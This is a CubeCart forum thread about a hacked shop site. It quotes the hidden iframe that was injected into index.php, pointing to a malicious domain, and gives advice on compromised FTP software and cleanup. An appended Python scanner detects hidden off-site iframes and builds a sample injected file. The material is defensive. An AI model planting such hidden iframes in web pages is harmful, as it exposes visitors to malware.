
CC4 Hacked


Guest tiptoncp

The particular site is still in development on a closed system, although the admin screen is still accessible for development login purposes. I just realized that the site had been hacked and there was an encoded script injected at the bottom of the index.php file in the main directory. The script is linked to a high-risk malicious domain.

This is the iframe it injected. I did not decode the script, so I don't know if this is all it was doing or not.

<iframe width="635" height="586" style="display: none;" src="http://besenok.org/stds/go.php?sid=1&amp;12694ea4d" name="f884005"/>

I saw the update that apparently fixes some vulnerabilities with sessions. When I implemented it, it screwed up all of my user/superuser admin dashboards. The access rights were still correct, as it would prompt saying you did not have access to this page if you were just an admin, but instead of hiding the links like before, it was showing everything.

I have looked at the new code for the sessions, but I cannot find anything linked to the visibility of the inaccessible items. Any ideas?

Also, is the sessions fix directly related to the attack I mentioned above?

Thanks


You need to contact your hosting company as they will be able to trace the hack. It may not have come in via CubeCart, but through someone else on that server. It's important to keep software on servers up-to-date to help prevent this type of thing; if someone else on the server has not upgraded their software, the hack may have come in through there. Either way, your hosting company needs to know.


  • 2 weeks later...
Guest tiptoncp

You brought up a good point that I didn't even think about... :(

Running 4.3.0, implemented this patch http://forums.cubecart.com/index.php?showtopic=39766

Makes my admin panel fully visible regardless of permissions. However, permissions are still intact and it prompts a message saying access restricted when clicking on something.

So, I guess I need to implement the changes from 4.3.0 to 4.3.5 and then implement this patch. Usually, security patches are standalone in version number. The site and admin panel are heavily modified. So, I try to only do security updates.

If you have any other ideas, let me know. Otherwise, I'll go back and start implementing the previous patches.


Guest tiptoncp

Oh, no. I haven't done the latest one. Just saw it today, actually.

Well... I'm not sure why 4.3.6 would change everything then... but it does. I looked at the code. Maybe I missed it, but I didn't see anything related to visibility of items. Which, I wouldn't expect it to be. So, I'm a bit lost as to why it has an effect on that.


Guest asafisk

The only time I've seen this before is when someone used compromised FTP software to upload files. The FTP program (I forget the name now) inserted an iframe in any 'index.' file that was uploaded.

I guess FTP software could become compromised in a number of ways, the two most likely being:

1. the FTP software has been hacked before being installed

2. there is a virus on the PC which has contaminated the FTP software

Of course you would need to change the FTP login details as these will most likely have been reported to the iframe host.

If you have uploaded files to other sites they should also be checked.

I would recommend running good antivirus (my favourite at the moment is Kaspersky) and removing and replacing the FTP software with something clean and secure. I quite like SmartFTP.

The iframe can then be removed manually and the file re-uploaded.

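For checking the other sites and 'index.' files mentioned in the last reply, here is an added example (not part of any post in this thread, and not CubeCart code) that walks a web root and reports hidden iframes pointing at a host you do not own. The host names `bad.example` and `shop.example`, the function names and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Hidden by CSS, or collapsed to 0/1 pixel by width/height attributes.
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?[01](?!\d)",
    re.IGNORECASE)
SRC_HOST_RE = re.compile(r"\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>:]+)", re.IGNORECASE)

def find_hidden_iframes(text, own_hosts=()):
    """Return (line_no, host) for each hidden iframe whose src is off-site."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src = SRC_HOST_RE.search(tag)
        if src and HIDDEN_RE.search(tag) and src.group(1).lower() not in own_hosts:
            hits.append((text.count("\n", 0, m.start()) + 1, src.group(1).lower()))
    return hits

def scan_webroot(root, own_hosts=()):
    """Check every file named index.* under root, the files the thread says were hit."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.name.lower().startswith("index."):
            hits = find_hidden_iframes(path.read_text(encoding="utf-8", errors="replace"), own_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def build_sample_webroot(root):
    """Constructed sample files; the host names are placeholders."""
    files = {
        "index.php": "<?php\necho 'shop';\n?>\n"
                     '<iframe width="635" height="586" style="display: none;" '
                     'src="http://bad.example/go.php?sid=1" name="f1"/>\n',
        "admin/index.php": '<iframe src="https://shop.example/help" width="600"></iframe>\n',
        "about.html": '<iframe style="display:none" src="http://bad.example/x"></iframe>\n',
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        print(scan_webroot(tmp, own_hosts={"shop.example"}))
```

This only matches iframe tags written literally into the file. An encoded script that emits the iframe at runtime, as in the first post, will not match, so also compare each file against a known-good copy.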
